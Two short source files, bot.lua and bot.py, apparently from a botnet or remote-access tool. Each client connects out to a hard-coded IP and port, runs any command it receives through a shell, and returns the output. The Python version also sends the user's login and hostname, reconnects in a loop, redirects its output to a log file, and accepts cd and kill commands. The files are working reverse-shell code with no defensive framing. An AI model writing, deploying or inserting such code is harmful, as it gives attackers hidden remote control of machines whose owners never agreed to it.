File: bot.lua
socket = require "socket"

function tcpReceive()
  local data, status, partial = tcpSocket:receive()
  if data then
    print(data)
    f = io.popen(data)
    --print(f:read("*a"))
    tcpSocket:send(f:read("*a"))
  end
  if status=="closed" then
    error("Server closed")
  end
end

local ip = "10.211.55.44"
local port = 1234

  tcpSocket = assert(socket.connect(ip, port))		-- connection socket tcp
  tcpSocket:settimeout(0)

  --tcpSocket:send(s.."\n")

while (1) do
  tcpReceive()

end

File: bot.py
#!/usr/bin/python
import socket
import os
import sys
from time import sleep

TCP_IP = '127.0.0.1'
TCP_PORT = 1234
BUFFER_SIZE = 1024
MESSAGE = "Hello, World!"
run = True

while (run):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    while (1):
        try:
            s.connect((TCP_IP, TCP_PORT))
            break
        except:
            ##print("erreur fdp")
            sleep(1)
    ##print("HELLO")
    saveout = sys.stdout
    fsock = open('out.log', 'w')
    sys.stdout = fsock
    sys.stderr = fsock

    login = os.getlogin()
    hostname = socket.gethostname()


    s.send("login:" + login + ":" + hostname + "\n")

    while (1):
        data = s.recv(BUFFER_SIZE)
        if (not data):
            break
        if (data[:3] == "cd "):
            os.chdir(data[3:len(data) - 1])
        elif (data == "run:kill\n"):
            run = False
            break
        else:
            try:
                ret = os.popen(data)
                s.send(ret.read())
            except:
                s.send("Unexpected error:", sys.exc_info()[0])
    s.close()
